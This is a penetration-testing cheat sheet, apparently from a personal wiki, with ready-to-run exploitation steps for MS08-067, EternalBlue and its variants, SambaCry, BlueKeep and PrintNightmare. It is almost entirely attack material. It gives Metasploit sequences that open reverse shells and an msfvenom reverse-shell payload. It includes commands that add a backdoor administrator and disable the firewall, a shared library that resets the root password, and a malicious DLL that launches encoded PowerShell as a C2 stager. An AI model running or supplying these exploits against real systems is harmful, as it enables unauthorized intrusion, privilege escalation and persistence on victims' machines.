Low-Hanging Fruits

net_api
CVE-2008-4250, MS08-067
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
Exploit:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalBlue
CVE-2017-0144, MS17-010
MSF
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
Exploit with:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalRomance / EternalSynergy / EternalChampion
Exploit with ms17_010_psexec:
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
Exploit with ms17_010_command:
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user snovvcrash Passw0rd! /add && net localgroup administrators snovvcrash /add"
msf > run
Manually
​https://github.com/helviojunior/MS17-010​
​https://github.com/jdiazmx/MS17-010_WORAWIT​
​https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010​
Send MSF payload and execute it with send_and_execute.py:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
Or just execute commands on host via zzz_exploit.py (at least one named pipe must be accessible on target):
$ python zzz_exploit.py 192.168.1.11
zzz_exploit.py
# ...
def smb_pwn(conn, arch):
	service_exec(conn, r'cmd /c net user snovvcrash Passw0rd! /add && cmd /c net localgroup administrators snovvcrash /add && cmd /c netsh firewall set opmode disable')
# ...
For x86 EternalBlue shellcodes use AutoBlue-MS17-010.
A patch for grabbing remote files from Victim:
$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch
FuzzBunch (Wine)
​https://github.com/fuzzbunch/fuzzbunch​
​https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956​
​https://habr.com/ru/post/327490/​
SambaCry
CVE-2017-7494 (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)
MSF
msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run
Manually
​https://github.com/opsxcq/exploit-CVE-2017-7494​
​https://github.com/joxeankoret/CVE-2017-7494​
Compile .so SUID shared library:
pwn.c
// gcc -shared -fPIC -o pwn.so pwn.c
​
#include <stdio.h>
#include <stdlib.h>
​
static void pwn() __attribute__((constructor));
​
void pwn() {
	setresuid(0,0,0);
	system("echo 'root:Passw0rd!'|chpasswd");
}
Get real share path on the target's filesystem:
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path:    /home/snovvcrash/sharename
Upload pwn.so to target and then run the exploit:
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7
$ source venv/bin/activate.sh
$ pip install -r requirements.txt
$ . venv/bin/activate
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
BlueKeep
CVE-2019-0708
Check:
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
Exploit:
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
PrintNightmare
CVE-2021-16751, CVE-2021-34527
​https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html​
​https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/​
Check
CrackMapExec
​https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py​
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler
ItWasAllADream
​https://github.com/byt3bl33d3r/ItWasAllADream​
$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'
Exploit
C/C++
RCE (fork of the original repo):
​https://github.com/afwu/PrintNightmare​
LPE:
​https://github.com/hlldz/CVE-2021-1675-LPE​
Python
RCE:
​https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py​
​https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py​
​https://www.hackthebox.eu/blog/windows-protocols-python​
Usage
1.Prepare an SMB share with anonymous authentication allowed (smbserver.py also works):
2.Generate an evil DLL: a С2 stager / add user to a privileged group (1, 2, 3, etc.) / invoke a custom command (see example below).
3.Run the exploit:
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
pwn.c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared
​
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
​
// Default function that is executed when the DLL is loaded
void Entry() {
    system("powershell -enc <BASE64_PWSH_CODE>");
}
​
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
      break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
      break;
  }
  return TRUE;
}
Leveraging PrintNightmare to Abuse RBCD and DCSync the Domain
snovvcrash@gh-pages:~$ _
C#
RCE + LPE:
​https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare​
PowerShell
LPE:
​https://github.com/calebstewart/CVE-2021-1675​
Reproducibility
Flowchart by @wdormann:
Mitigation
​https://github.com/LaresLLC/CVE-2021-1675​
Last modified 5mo ago